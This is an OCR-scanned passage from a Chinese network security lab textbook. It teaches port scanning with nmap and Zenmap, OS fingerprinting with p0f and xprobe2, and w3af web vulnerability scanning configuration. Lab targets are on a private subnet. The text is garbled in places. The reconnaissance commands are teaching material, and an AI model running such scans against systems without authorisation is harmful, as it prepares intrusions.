UDP 53 两 个 端口 号 ) ,因此 端口 扫描 需要 分 别针 对 TCP 和 UDP 协议 的 端口 号 进行 扫描 。 
H T TCP 协议 要 比 UDP 协议 复杂 ,因此 针对 TCP 端口 的 扫描 也 要 比 UDP 端口 扫描 复杂 。 
ТСР 端口 扫描 包括 连接 (connect) 扫 描 、SYN 扫描 、TCP 窗口 扫描 、FIN 扫描 ,ACK 扫描 等 。 

1. 连接 扫描 

攻击 者 (扫描 主机 ) 通 过 调用 系统 的 connect() 函 数 ,可 以 与 目标 主机 的 每 个 端口 尝试 通 
过 三 次 握手 建立 TCP 连接 ,在 攻击 者 发 起 连接 请 求 ( 第 一 次 握手 ) 后 ,如 果 目 标 主机 上 对 应 
的 端口 打开 , 则 返回 一 个 第 二 次 握手 的 ACK/SYN 报 文 ,connect() 调 用 将 再 发 送 一 个 ACK 
确认 报 文 以 完成 第 三 次 握手 。 如 果 目 标 端口 是 关闭 的 ,那么 目标 主机 将 会 直接 返回 一 个 
RST 报 文 。 基 于 此 工作 原理 ,通过 分 析 不 同 目标 端口 的 返回 报 文 信息 ,攻击 者 就 可 以 判断 
哪些 端口 是 开放 或 关闭 的 。 该 方法 实现 简单 ,但 目标 主机 上 会 记录 相关 的 尝试 连接 信息 A 
易 被 系统 管理 员 或 安全 检测 软件 发 现 。 

2. SYN 扫描 

SYN 扫描 也 称 为 半 开 连接 扫描 ,是 对 连接 扫描 的 一 种 改进 。 在 连接 扫描 方法 中 , 当 被 
扫描 端口 打开 时 ,目标 主机 会 返回 一 个 SYN/ACK 报 文 。 当 攻击 者 收 到 第 二 次 握手 的 
SYN/ACK 报 文 时 ,其 实 不 需要 进行 第 三 次 ACK 握手 ,就 已 经 判断 出 被 扫描 端口 当前 处 于 
打开 状态 。 不 过 , 当 目 标 主机 (Server) 向 ТСР 连接 请 求 者 (Client) 返 回 ЅҮМ/АСК 报 文 后 ， 
将 处 于 “ 半 开 连接 ”状态 ,等 待 请 求 者 的 ACK 确认 ,以 便 完成 第 三 次 握手 过 程 。 此 时 ,攻击 
者 并 没有 向 目标 主机 返回 ACK 确认 报 文 ,而 是 构造 了 一 个 RST 报 文 ,让 目标 主机 释放 该 
“ 半 开 连接 ”。 

由 于 各 类 操作 系统 一 般 不 会 记录 “ 半 开 连接 ”信息 ,因此 SYN 扫描 的 安全 性 要 比 连接 
扫描 好 。 

3. UDP 端口 扫描 

UDP 端口 扫描 用 于 探测 目标 主机 上 打开 的 UDP 端口 和 网 络 服务 。UDP 端口 扫描 的 
实现 原理 是 : 首先 构造 并 向 目标 主机 发 送 一 个 特殊 的 UDP 报 文 ,如 果 被 扫描 的 UDP 端口 
关闭 ,将 返回 一 个 基于 ICMP 协议 的 “端口 不 可 达 ” 差 错 报 文 ; 如 果 被 扫描 的 UDP 端口 处 于 
打开 状态 ,处 于 “监听 ”状态 的 UDP 网 络 服务 将 响应 特殊 定制 的 数据 报 文 ,从 而 返回 UDP 
数据 。 

UDP 端口 扫描 的 实现 原理 简单 ,效率 较 高 。 但 是 ,如 果 被 探测 的 网 络 服务 是 一 个 未 入 
的 应 用 时 ,就 可 能 无 法 返回 UDP 数据 。 


5.3.2 实验 目的 和 条 件 


1. 实验 目的 

在 学 习 ТСР 三 次 握手 、TCP/UDP 端口 .服务 进程 等 网 络 基 本 知识 的 基础 上 ,通过 对 
Zenmap 和 nmap 工具 使 用 方法 的 练习 ,进一步 掌握 端口 扫描 的 实现 方法 。 

2. 实验 条 件 

为 了 取得 更 好 的 实验 效果 ,建议 本 实验 在 局 域 网 中 进行 。 本 实验 中 攻击 者 仍然 采用 运 
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行 BT5 的 计算 机 ,需要 在 该 主机 上 运行 Zenmap 和 птар 工具 。 





5.3.3 实验 过 程 


步骤 1: 正确 登录 BT5 系统 。 如 果 进 入 的 是 命令 行 模式 ,为 方便 实验 进行 ,可 输入 
“startx” 命 令 切 换 到 图 形 界面 

步骤 2. 选择 菜单 栏 上 的 Terminal 选项 ,打开 终端 操作 窗口 。 

步骤 3: 可 以 依次 选择 Application >Backtrack—>Information Gather Network Analysis 





Network Scanners>Zenmap 选项 ,启动 Zenmap 工具 。 

Zenmap 提供 了 11 种 可 供 选 择 的 扫描 方式 ,可 以 通过 单 击 Profile 菜单 项 来 选择 。 在 选 
择 了 具体 的 扫描 方式 后 ,就 可 以 看 到 相应 扫描 方式 所 采用 的 命令 ,所 执行 的 命令 显示 在 
Command 框 中 ,如 图 5-18 所 示 。 














x Zenmap 








Target: | 
Command: |nmap -T4 -A -v 


Í Hosts | Services Nmap Output Ports / 


OS Host "| 














Filter Hosts 


ши 2ептар 


5-18 Zenmap 提供 的 扫描 方式 


步骤 A. 如 果 扫 描 方 式 不 符合 攻击 者 的 当前 要 求 ,可 以 创建 一 个 新 的 扫描 (New Profile 
or Command) ,或 者 在 已 有 扫描 方式 的 基础 上 进行 编辑 (Edit Selected Profile), 如 图 5-19 
所 示 。 
步骤 5. 在 本 实验 中 ,可 以 选择 New Profile or Command 选项 ,打开 Profile Editor 对 
话 框 ,如 图 5-20 所 示 。 在 Profile name 文本 框 中 输入 一 个 标识 本 次 扫描 操作 的 名 称 。 
步骤 6: 选择 Scan 选项 卡 后 ,出 现 如 图 5-21 所 示 的 对 话 框 。 在 该 对 话 框 中 出 现 了 
Profile,Scan,Ping,Scripting, Target, Source, Other, Timing 等 选项 。 读 者 可 根据 具体 的 攻 
击 实验 需要 进行 选择 和 配置 。 本 实验 将 对 192. 168. 1. 1-254 网 段 中 的 主机 端口 进行 扫描 ， 
所 有 信息 输入 结束 后 , 单 击 Save Changes 按钮 进行 确认 。 
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Zenmap 














]| [son] [cancel 














[hosts | Services 


OS Host "| 














Filter Hosts 








š [petats 








图 5-19 创建 一 个 新 扫描 方式 


Profile Editor 
[map -T4 -A - 








Profie scan Ping scrptng “Target soute Other Tmg 
Profile Information 
Profile name | 


Description 

















| [scan 
Help 
Description 
The description is a full 


description of what the scan 
does, which may be long. 


| Cancel [save Changes 





5-20 Profile Editor 对 话 框 


需要 说 明 的 是 ,在 具体 实验 过 程 中 ,读者 可 结合 不 同情 况 ,通过 选取 不 同 的 选项 ,学 习 扫 
描 过 程 , 并 对 扫描 结果 进行 分 析 , 以 便 对 工具 的 应 用 和 功能 有 更 加 全 面 的 认识 ,同时 对 知识 


的 系统 掌握 也 会 有 所 帮助 。 
步骤 7: 选择 птар 选项 ,如 图 5-22 所 示 。 
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Targets (optional): 
ТСР scan: TCP SYN scan (-55) MI 
Non-TCP scans: None "| 
Timing template: None 


uj 





Г) Enable all advanced/aggressive options (-A) 
О Operating system detection (-O) 





Г) Version detection (-sV) 
О Idle Scan (Zombie) (s) | 








Г) FTP bounce attack (-b) 
Г) Disable reverse DNS resolution (-n) 
口 IPv6 support (-6) 














Help 
Version detection 


Attempt to discover the 


version number of services 
running on remote ports. 


Cancel | | Ё Save Changes 





图 5-21 对 扫描 对 象 及 相关 参数 进行 配置 





Target: [192.168.1.1-254 | 了 | Profile: [птар 


птар -55 -Р5 192.168.1.1-254 


[| Services | | nmap Output Ports 








Filter Hosts 























图 5-22 选择 птар 选项 





步骤 8; 单 击 Scan 按钮 ,开始 对 192. 168. 1. 1-254 网 段 存在 的 主机 进行 端口 扫描 ,扫描 
前 处 于 运行 状态 的 所 有 主机 ,在 右 侧 列 
表 中 显示 了 其 中 一 台 主 机 当前 打开 的 端口 信息 ,包括 端口 号 、 当 前 状态 、 服 务 进 程 的 名 称 及 


结果 如 图 5-23 所 示 。 其 中 ,在 Host 列表 中 显示 了 当 








主机 网 卡 的 MAC 地 址 等 内 容 , 收 集 到 的 信息 非常 全 





E 
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Zenmap 








Target: |192.168.1.1-254 | + | Profile: | | [Scan] [cancel 
Command: [nmap -sS -PS 192.168.1.1-254 




















| птар -55 -PS 192.168.1.1-254 








192.168.1.1 
Starting Nmap 6.01 ( http://nmap.org ) at 
і 2013-01-30 11:54 EST 
4 
192266420 Nmap scan report for 192.168.1.1 
bogon (192.1 Host is up (0.00036s latency). 
192.168.1.10t Not shown: 996 closed ports 
PORT STATE SERVICE 
bogon (192.1@# 23/tcp open telnet 
192.168.1.11: 80/tcp open http 
bogon (192.16 1723/tcp open pptp 
1900/tcp open upp 
192308111 MAC Address: 6C:ED:73:FF:3C:04 (Unknown) 
192.168.1.11€ 


192.168.1.13 Nmap scan report for bogon (192.168.1.100) 
1] Host is ир (0.000084s latency). 

bogon (192.11 Not shown: 991 closed ports 

192.168.1.18: E PORT STATE SERVICE 


— 22/tcp open ssh 
[ = 80/tcp open http 


rc 111/1ср open rpcbind 














图 5-23 显示 扫描 结果 
步 又 9: 单 击 Topology 按钮 ,可 以 查看 扫描 发 现 的 网 络 拓扑 结构 ,如 图 5-24 所 示 。 





Target: [192.168.1.1-254 | + | Profile: [птар [»] [scan] Cancel 
Command: [nmap -sS -PS 192.168.1.1-254 


Be ee 
Hosts Viewer | Fisheye | controls Save Graphic 
|risheye] 











192.168.1.1 

bogon (192.18 
192.168.1.103 
bogon (192.1 


192.168.1.106 ЗЕРИН 
bogon (192.16 E (192.168.1.179) 


192.168.1.1: 
bogon (192.16 
192.168.1118 d (Der 092168111) 
192.168.1.119 jx 118 
192.168.1.1: 
bogon (192.16 
192.168.1.18: 








Filter Hosts 








图 5-24 显示 扫描 结果 的 拓扑 


步骤 10: 如 果 要 保存 Zenmap 的 扫描 结果 ,可 以 选择 Scan— Save Scan 选项 ,并 进行 保 
存 , 默 认 保 存 格式 为 . xml, 如 图 5-25 所 示 。 
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Save їп folder: | Desktop 





а 











Browse for other folders 


Select File Туре: | Nmap XML format (xml) v 
| Cancel [зае] NE 


5-25 ”保存 当前 的 扫描 结果 








步骤 11: 在 实验 中 ,可 以 对 同一 对 象 范围 或 同一 对 象 范围 中 的 不 同 部 分 进行 多 次 扫描 ， 
并 对 扫描 结果 进行 比较 ,看 是 否 存在 不 同 。 本 实验 中 ,在 保存 了 第 一 次 扫描 结果 后 ,接着 修 
改 扫 描 目 标 ( 如 192. 168. 1.1-118)( 缩 小 了 扫描 范围 ), 然 后 进行 第 二 次 扫描 ,并 保存 扫描 结 





果 , 将 文件 名 确定 为 nmap02. xml。 


然后 ,选择 Tools>Compare Results 选项 ,对 两 次 扫描 结果 进行 比较 。 其 中 ,在 A Scan 
下 拉 列 表 中 选择 nmap on 192. 168. 1. 1-118 选项 ,在 B Scan 下 拉 列 表 中 选择 птар on 192. 


168. 1-254 选项 ,比较 结果 如 图 5-26 所 示 。 





Compare Results 


А Scan B Scan 





[птар оп 192.168.1.1-118 


[+] Scan Output 


ES оре] 





+Nmap 6.01 scan initiated Wed Jan 30 11:54:52 2013 as: птар -SS -PS 192.168.1.1-254 


192.168.1.1, 6C:E8:73:FF:3C:04: 
Host is up. 

Not shown: 996 closed ports 
PORT STATE SERVICE VERSION 
23/tcp open telnet 

80/tcp open http 

1723/tcp open pptp 

1900/tcp open upnp 


bogon (192.168.1.100, 28:51:32:03:45:E6): 
Host is up. 

Not shown: 991 closed ports 

PORT STATE SERVICE VERSION I 
22/tcp open ssh 

80/tcp open http 

lll/tcp open rpcbind 

443/tcp open https 


В 526 ”对 两 次 扫描 结果 进行 比较 分 析 


[птар оп 192.168.1.1-254 


\+\5сап Output 


| » | [even] 





| 


° 
š 





fa 





其 中 ,字符 “-” 表 明 B Scan 中 没有 该 行 结果 ,相应 地 ,字符 “十 ”表明 В Scan 中 增加 了 该 


扫描 结果 。 
图 5-26 中 可 以 看 出 ,两 次 扫描 的 IP 范围 不 同 。 


任务 与 思考 

















5.3.4 


通过 本 实验 ,使 读者 可 以 对 птар 和 Zenmap 两 个 典型 工具 的 功能 特点 和 使 用 方法 有 
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一 个 较为 全 面 的 认识 ,通过 比较 分 析 ,读者 也 可 以 掌握 更 多 有 关 端 口 扫 描 的 知识 。 与 nmap 
相 比 ,Zenmap 的 优势 表现 在 以 下 几 个 方面 。 
СТ) 提供 良好 的 交互 性 。Zenmap 以 直观 的 方式 输出 结果 ,甚至 能 绘制 发 现 网 络 的 拓扑 。 
(2) 可 以 在 两 个 扫描 结果 之 间 进 行 比较 。 
(3) 能 够 对 扫描 结果 进行 跟踪 。 
(4) 能 够 帮助 渗透 测试 人 员 多 次 运行 相同 配置 进行 扫描 。 
(5) 显示 所 执行 的 命令 ,以 方便 渗透 测试 人 员 检 查 。 


5.4 系统 类 型 探测 : 主机 系统 识别 


5.4.1 预备 知识 : 主机 探测 


通过 主机 扫描 和 端口 扫描 ,可 以 确定 被 攻击 目标 使 用 的 TP 地 址 及 开放 的 端口 。 在 此 基 
础 上 ,还 需要 对 被 攻击 主机 所 使 用 的 操作 系统 类 型 和 具体 的 版 本 号 及 提供 的 网 络 服 务 进 行 
探测 ,为 攻击 者 下 一 步 选择 具体 的 攻击 方法 并 确定 具体 的 攻击 步骤 做 好 准备 。 系 统 类 型 探 
测 分 为 操作 系统 类 型 探测 和 网 络 服务 类 型 探测 两 种 。 

1. 操作 系统 类 型 探测 

操作 系统 类 型 探测 (OS Identification) 是 通过 采取 一 定 的 技术 手段 ,通过 网 络 远程 探测 
目标 主机 上 安装 的 操作 系统 类 型 及 其 版 本 号 的 方法 。 在 确定 了 操作 系统 的 类 型 和 具体 版 本 
号 后 ,可 以 为 进一步 发 现 安全 漏洞 和 渗透 攻击 提供 条 件 。 

协议 栈 指纹 分 析 (Stack fingerprinting) 是 一 种 主流 的 操作 系统 类 型 探测 手段 ,其 实现 
原理 是 在 不 同类 型 和 不 同 版 本 的 操作 系统 中 ,网 络 协议 栈 的 实现 方法 存在 着 一 些 细微 的 区 
别 , 这 些 细微 区 别 就 构成 了 该 版 本 操作 系统 的 指纹 信息 。 通 过 创建 完整 的 操作 系统 协议 栈 
指纹 信息 库 ,将 探测 或 网 络 嗅 探 所 得 到 的 指纹 信息 在 数据 库 中 进行 比 对 ,就 可 以 精确 地 确定 
其 操作 系统 的 类 型 和 版 本 号 。 

2. 网 络 服务 类 型 探测 

网 络 服务 类 型 探测 (Service Identification) 的 目的 是 确定 目标 主机 上 打开 的 端口 ,以 及 
该 端口 上 绑 定 的 网 络 应 用 服务 类 型 及 版 本 号 。 通 过 网 络 服务 类 型 探测 ,可 以 进一步 确定 目 
标 主机 上 运行 的 网 络 服务 及 服务 进程 对 应 的 端口 。 

操作 系统 类 型 探测 主要 依赖 于 TCP/IP 协议 栈 的 指纹 信息 , 它 涉及 网 络 层 、 传 输 层 、 应 
用 层 等 各 层 的 信息 ,而 网 络 服务 类 型 探测 主要 依赖 于 网 络 服务 在 应 用 层 协 议 实现 所 包含 的 
特殊 指纹 信息 。 例 如 ,同样 是 在 应 用 层 提 供 HTTP 服务 的 Apache 和 IS, 两 者 在 实现 
HTTP 协议 规范 时 的 具体 细节 上 存在 一 些 差异 ,根据 这 些 差异 就 可 以 辨别 出 目标 主机 的 
TCP 80 端口 上 运行 的 HTTP 服务 是 通过 Apache 还 是 通过 IIS 实现 的 。 


5.4.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,使 读者 对 网 络 服务 进程 有 更 深入 的 学 习 , 同 时 通过 对 主机 系统 识别 工具 使 
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方法 的 练习 ,掌握 主机 识别 的 主要 方法 和 途径 。 
2. 实验 条 件 
为 便于 实验 的 进行 ,本 实验 采用 表 5-1 所 示 的 实验 清单 。 

#51 主机 识别 实验 清单 











Ж 
































类 型 序 号 HEFER 规 格 
1 数量 16 

攻击 机 2 操作 系统 版 本 BT5 
8 软件 版 本 xprobe2 
1 数量 16 

靶 机 2 操作 系统 版 本 Windows Server 2003 
3 软件 版 本 无 

5.4.3 实验 过 程 


步 又 1: 运行 攻击 机 。 正 确 登录 BT5 系统 ,如 果 进 入 的 是 命令 行 模式 ,为 方便 实验 进行 ， 
可 输入 “startx” 命 令 进 入 图 形 界面 。 选 取 菜单 栏 上 的 Terminal 选项 , 打 开 终端 操作 窗口 ， 

步骤 2: 运行 pof TE... pof 是 以 一 个 用 被 动 方式 探测 目标 主机 操作 系统 类 型 的 工具 ， 
该 工具 可 以 工作 在 连接 到 本 地 的 机 器 、 本 地 连接 到 的 机 器 \ 不 能 连接 到 的 机 器 、 可 以 浏览 其 
社区 的 机 器 等 几 种 场景 下 。 可 以 依次 选择 Application Back Track — Information Gathering 
Network Analysis-*OS Fingerprinting—>p0Í 选项 启动 。 启 动 后 ,系统 将 显示 其 所 有 参数 及 
帮助 说 明 , 如 图 5-27 所 示 。 





^ v X root@bt: ~ 
File Edit View Terminal Help 


display ur 
display kn 


Filter rul 


bt:-e | 








5-27 ”启动 pof 后 显示 的 帮助 信息 


步骤 3. 打开 该 程序 后 ,首先 输入 “p0f -o pof. Log” 命 令 ,该 命令 会 将 登录 信息 保存 到 
pOf. Log 文件 中 ,如 图 5-28 8 所 示 。 
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^ v X root@bt:~ 
File Edit View Terminal Help 


:~# pef -o pef.log 
е os fingerprinting utility, version 2.0.8 
ski «lcamtufedione. , W. Stearns-«wstearnsQpobox. com» 
: listening (SYN) оп 'eth6', 262 sigs (14 generic, cksum"BRgFSCA2), rule: 'al 





图 5-28 输入 “p0f -o p0f. Log” 命 令 将 登录 信息 保存 到 рог. Log 文件 中 





步骤 4: 接 下 来 ,打开 Windows Server 2003 并 正常 登录 ,运行 靶 机 。 
靶 机 正常 启动 后 ,需要 产生 一 些 网 络 活动 ,以 触发 TCP 连接 。 例 如 ,可 以 Telnet 到 
主机 (根据 实验 环境 而 定 ) ,接着 就 会 识别 系统 类 型 。 这 里 Telnet 虽然 没有 成 功 ,但 不 影 


响 实 验 效 果 , 如 图 5-29 所 示 











有 1985-2003 M 





nd Setting: or>ping 192.168.1. 
Pinging 192.168.1.114 with 32 bytes of data: 


from 192. 1 
from 192.168.1. 
from 192.168.1. 
1 


from 192.168.1. time<ins 


eived = 4, Lost = 
in milli-secon 
Average = B 


|с: Documents and Setting ator>telnet 19 
I 正在 连接 到 192 .168.1.114. E 


[C:\Documents and Settings Administrator) 





В 5-29 通过 telnet 命令 任意 触发 一 个 TCP 连接 





步骤 5: 接 下 来 ,在 攻击 机 上 查看 pof. Log 文件 。 通 过 “cat pof. Log ”命令 分 析 记 录 的 
内 容 , 即 可 看 到 已 经 分 析出 对 方 操作 系统 的 类 型 为 XP 或 2000 SP4 了 。 虽 然 探 测 结果 和 实 
际 情况 有 些 出 入 ,但 还 是 大 概 探 测 出 了 主机 的 系统 类 型 .如 图 5-30 所 示 。 
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Windows 2000 5Р4, XP SP1+ 
t /modem) 
Windows 2000 5Р4, XP SPl+ 
t/modem} 
Windows ЕЛГЕ». ра 





В 5-30 分析 探 测 到 的 主机 类 型 


步骤 6: 使 用 xprobe2 工具 进行 主机 类 型 的 探测 。xprobe2 是 一 个 主动 的 操作 系统 识 
别 工 具 , 通 过 模糊 签名 匹配 .可 能 性 猜测 、 同 时 多 匹配 和 签名 数据 库 来 识别 操作 系统 。 因 为 
该 工具 使 用 原始 套 接 字 , 所 以 必须 运行 在 root 权限 下 。 可 以 依次 选择 BackTrack > 
Information Gathering Network Analysis OS Fingerprinting>Xprobe2 选项 启动 ,启动 
后 会 显示 其 语法 和 选项 说 明 ,如 图 5-31 Bros 

| > ~ * root@bt: ~ 
File Edit View Terminal Help 
nd delay» k g de onds) 


ber <WBmnvm>. 
oda 


an for spügified port(s) 
t-t орі). 
E WI 


ш Bng. É reto logfile 


fptidhs #оей Тылы 


Perform analysis of e patKEfs gathered d 


NIDSs resetting connections). Use w 





图 5-31 显示 xprobe2 的 帮助 信息 


步骤 7: 对 远程 主机 探测 ,可 以 直接 通过 xprobe2 ,并 指定 远程 主机 IP 地 址 或 主机 名 。 
例如 ,通过 “xprobe2 192. 168. 1. 113” 命 令 将 会 对 该 主机 进行 远程 探测 ,显示 结果 如 图 5-32 
所 示 , 可 以 看 出 远程 主机 为 Windows 2003 Server 操作 系统 (这 里 已 经 很 准确 了 )。 
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x root@bt: ~ 
File Edit View Terminal Help 


[jicrosoft windows 2003 Server SIGIS ЕЕ 


: "Mic 2t дег diti 








KStabiensSP4" (Guel 
кттаттор 5Р2? бе| 


EO мото ы 5Р2" (Gue 


2000 Мойка ой SP 


90 Workstation 


В 5-32 显示 探测 到 的 远程 主机 操作 系统 类 型 


5.4.4 任务 与 思 


通过 本 实验 ,读者 对 BT5 的 操作 方法 有 了 更 全 面 的 掌握 。 同 时 ,还 有 一 个 问题 需要 思 
Ж: 获取 到 系统 版 本 后 能 做 什么 ? 

其 实 , 回 答 了 这 个 问题 ,也 就 为 后 面 的 实验 提前 做 了 准备 。 获 得 系统 版 本 之 后 可 以 继续 
探测 该 系统 存在 哪些 漏洞 ,然后 利用 漏洞 找到 对 应 的 攻击 工具 ,进一步 获取 攻击 过 程 中 所 需 
要 的 信息 。 


5.5 漏洞 扫描 : Web 安全 漏洞 扫描 及 审计 
5.5.1 预备 知识 : Web 漏洞 的 获取 方法 与 w3af 


1. 漏洞 扫描 

漏洞 扫描 除 用 于 网 络 攻击 外 ,还 用 于 对 网 络 的 安全 防御 。 系 统管 理 员 通过 对 网 络 漏洞 
的 系统 扫描 ,全 面 地 了 解 网 络 的 安全 状态 ,并 对 发 现 的 安全 漏洞 及 时 安装 补丁 程序 ,提升 网 
络 防范 攻击 的 能 力 。 

漏洞 扫描 技术 的 工作 原理 是 基于 目标 对 象 (操作 系统 、 网 络 服务 .应 用 程序 等 ) 的 特征 码 
来 实现 的 。 例 如 ,对 于 同一 个 类 型 和 版 本 号 的 操作 系统 来 说 ,针对 某 一 安全 漏洞 ,对 于 某 些 
网 络 请 求 的 应 答 ,安装 安全 补丁 前 后 会 存在 一 些 细微 的 差异 ,这 些 差异 便 构 成 了 针对 特定 安 
全 漏洞 的 特征 码 (指纹 信息 )。 漏 洞 扫描 技术 正 是 利用 了 这 些 特 征 码 来 识别 目标 对 象 是 否 存 
在 特定 的 安全 漏洞 。 

2. 漏洞 扫描 器 

网 络 漏洞 扫描 器 对 目标 系统 进行 漏洞 检测 时 ,首先 探测 目标 网 络 中 的 存活 主机 ,对 存活 
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主机 进行 端口 扫描 ,确定 系统 已 打开 的 端口 ,同时 根据 协议 栈 指 纹 技术 识别 出 主机 的 操作 系 
统 类 型 。 然 后 ,扫描 器 对 开放 的 端口 进行 网 络 服务 类 型 的 识别 ,确定 其 提供 的 网 络 服务 。 漏 
洞 扫描 器 根据 目标 系统 的 操作 系统 平台 和 提供 的 网 络 服务 ,调用 漏洞 资料 库 ( 一 般 该 资料 库 
需要 与 业界 标准 的 СУЕ 保持 兼容 ) 中 已 知 的 各 种 漏洞 进行 逐一 检测 ,通过 对 探测 响应 数据 
包 的 分 析 判 断 是 否 存在 漏洞 。 

3. w3af 

w3af(web applicaiton attack and audit framework, Web 应 用 攻击 与 审计 架构 ) 是 一 个 
Web 应 用 安全 的 攻击 .审计 平台 ,通过 增加 插件 的 方式 来 对 功能 进行 扩展 。w3af 是 一 款 用 
python 写 的 工具 ,同时 支持 GUI 和 命令 行 模式 。 

w3af 目前 已 经 集成 了 大 量 的 功能 丰富 的 各 类 攻击 和 审计 搬 件 ,为 便于 使 用 ,对 搬 件 进 
行 了 分 类 ,而 且 有 些 插件 还 提供 了 一 个 实用 工具 ,并 支持 多 种 加 解密 算法 。 下 面 介绍 几 类 典 
型 的 w3af 插件 。 

A) Crawl 类 插件 。Crawl( 候 取 ) 类 插件 的 功能 是 通过 候 取 网 站 站 点 来 获得 新 的 URL 
地 址 。 如 果 用 户 启用 了 Crawl 类 的 插件 ,将 会 产生 一 个 循环 操作 : A 插件 在 第 一 次 运行 时 
发 现 了 一 个 新 的 URL,w3af 会 将 其 发 送 到 插件 B; 如 果 搬 件 В 发现 了 一 个 新 的 URL, 则 会 
将 其 发 送 到 插件 A。 这 个 过 程 持续 进行 ,直到 所 有 插件 都 已 运行 且 无 法 找到 更 多 的 新 信息 
为 止 。 

(2) Audit 类 插件 。Audit( 审 计 ) 类 插件 会 向 Crawl 插件 疏 取 出 的 注入 点 发 送 特制 的 探 
测 信息 ,以 确认 是 否 存在 漏洞 。 

(3) Attack 类 插件 。 如 果 Audit 插件 发 现 了 漏洞 ,Attack( 攻 击 ) 类 插件 将 会 进行 攻击 
和 漏洞 利用 。 通 常会 在 远程 服务 器 上 返回 一 个 操作 界面 ,或 者 进行 SQL 注入 以 获取 数据 库 
中 的 数据 。 

(4) Infrastructure 类 插件 。Infrastructure( 基 础 设施 ) 类 插件 用 来 探测 有 关 目 标 系统 的 
信息 ,如 目标 系统 是 否 安装 了 WAF(Web Application Firewall. Web 应 用 程序 防火 墙 )、 目 
标 系统 运行 的 操作 系统 .目标 系统 上 运行 的 HTTP 守护 进程 等 。 

(5) Grep 类 插件 。Grep (检索 ) 类 插件 会 分 析 其 他 插件 发 送 的 HTTP 请 求 和 应 用 信 
息 , 并 识别 存在 的 漏洞 。 

(6) Output 类 择 件 。Output( 输 出 ) 类 插件 会 将 插件 的 数据 以 文本 、XML 或 HTML JÉ 
式 保存 , 供 分 析 使 用 。 另 外 ,如 果 启 用 了 text. file 和 xml. file 两 个 Output 插件 ,就 会 记录 有 
Ж Audit 类 插件 发 现 的 任何 漏洞 。 

另外 ,Mangle 类 插件 允许 用 户 修改 基于 正则 表达 式 的 请 求 和 响应 ,Broutforce 类 插件 
在 候 取 阶段 可 以 对 系统 进行 暴力 登录 ,Evasion 类 插件 通过 修改 由 其 他 插件 生成 的 HTTP 
请 求 来 绕 过 简单 的 入 侵 检测 规则 。 


5.2.2 实验 目的 和 条 件 





1. 实验 目的 
在 进行 该 实验 之 前 ,读者 事先 需要 对 漏洞 的 产生 、 安 全 威胁 及 管理 方法 有 所 掌握 。 在 此 


180 网 络 攻击 与 防御 实 训 





基础 上 ,通过 对 w3af 工具 使 用 方法 的 学 习 , 使 读者 能 够 掌握 服务 器 安全 漏洞 的 扫描 和 审计 
Jrik. 
2. 实验 条 件 





























本 实验 中 使 用 的 清单 和 软 硬 件 如 表 5-2 所 示 。 
#52 Web 安全 漏洞 扫描 及 审计 实验 清单 

类 型 序 号 HEFER 规 格 
1 数量 16 

攻击 机 2 操作 系统 版 本 BT5 
3 软件 版 本 w3af 
1 数量 16 

靶 机 2 操作 系统 版 本 Windows Server 2003 
3 软件 版 本 x 

5.5.3 实验 过 程 





步 又 1: 运行 攻击 机 。 正 确 登 录 BT5 系统 ,如 果 进 入 的 是 命令 行 模式 ,为 方便 实验 进 
行 ,可 输入 “startx” 命 令 进入 图 形 界面 ЕЕ 上 的 Terminal 选项 ,打开 终端 操作 窗口 。 

步骤 2: 运行 “cd ийнар 命令 ,切换 到 w3af 工作 目录 ,然后 使 用 “1s” 命 令 
查看 当前 目录 下 的 文件 ,如 图 5-33 所 示 。 





[~ ~ x root@bt: /pentest/web/w3af 
File Edit View Terminal нер 


es scripts w3af consote 
extlib plugins readme ^ tools  w3af gui 
rootébt: /pentest/web/w3af 





5-33 ”显示 /pentest/web/w3af 目录 下 的 内 容 


步骤 3. f FI". /w3af_console” 命 令 启 用 w3af., 并 转 到 个 性 化 的 控制 台 模 式 (w3af >>>) ,如 
图 5-34 所 示 。 虽 然 该 工具 同时 提供 了 GUI 版 本 ,但 考虑 到 控制 的 灵活 性 和 自 定义 配置 ,在 
具体 应 用 中 建议 使 用 控制 台 版 本 。 
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^ v 


File Edit View Terminal Help 


:/pentest/web/w3af# ./w3af console 
Checking if a new version is available in our SVN repository. Please wait.. 
At revision 6654. 
w3af>>> | 








В 5-34 waf 的 个 性 化 控制 台 模 式 


为 便于 实验 的 进行 ,建议 读者 使 用 "help” 帮 助 命令 ,查看 相关 的 命令 介绍 。 
步骤 4: 首先 使 用 "plugins” 命 令 配置 相关 的 插件 ,然后 用 "help?” 命 令 查 看 操作 命令 的 帮 
助 信息 ,如 图 5-35 所 示 。 
^ v X root@bt: /pentest/web/w3af 


File Edit View Terminal Help 


plugins 
af /plugin 


| grep : a ep plugins 
dis: y ew, i еа discovery plugins 


plugins 

plugins 

ngle i copf ще е, le glips 
аһ pw Gont du e W аш dm i 

Га iewi бор igts W iiu eredi phu 
output figure C- output plug 








Р 5-35 进入 plugins 目录 并 显示 帮助 信息 


步骤 5: 输入 “output” 命 令 配置 output 类 插件 ,将 显示 如 图 5-36 所 示 的 信息 。 
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^ у X root@bt: /pentest/web/w3af 
File Edit View Terminal Help 


t DE 
t identifi lnerabilities Т 
V file. 
ай] report to_specifiedlagoressës, 
[21 Та һе T ГГ] CERTE dee Т] 
бињо di$cdyetys tb З, fil 
Saves messa to 








图 5-36 ”输入 “output” 命 令 后 显示 的 信息 
步骤 6: 使 用 “view ”命令 列 出 可 利用 的 选项 和 值 ,如 图 5-37 所 示 。 


^ м X rootGbt: /pentest/web/w3af 
File Edit View Terminal Help 
htmlFile 
htmlFil 
htmlFile» 
utp :htmlF 
/output/ htmlFile» 
utput 
config 
confi 
con 


рё гірііоп 


True if flebug information will be арретӣ 


g config: 
w3af/plugin t| config: 
/plugin 





图 5-37 使 用 “view” 命 令 列 出 可 利用 的 选项 和 值 








步骤 7: 使 用 “set fileName testreport. html” 命 令 ,设置 输出 的 扫描 报告 文件 为 testreport. 
html, 如 图 5-38 所 示 。 
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File Edit View Terminal Help 
w3af/plugins/output/config:htmlFile»»» 
lw3af/plugins/output/config:htmlFile>>> 
lw3af/plugins/output/config:htmlFile>>> 
lw3af/plugins/output/config:htmlFile>>> set verbose True 
lw3af/plugins/output/config:htmlFile>>> set fiteName testreport;html 
W3af/plugins/output/config:htmlFile»»» 
lw3af/plugins/output/config:htmlFile>>> 
lw3af/plugins/output/config:htmlFile>>> 
lw3af/plugins/output/config:htmlFile>>> 
lw3af/plugins/output/config:htmlFile>>> 
lw3af/plugins/output/config:htmlFile>>> 
lw3af/plugins/output/config:htmlFile>>> 
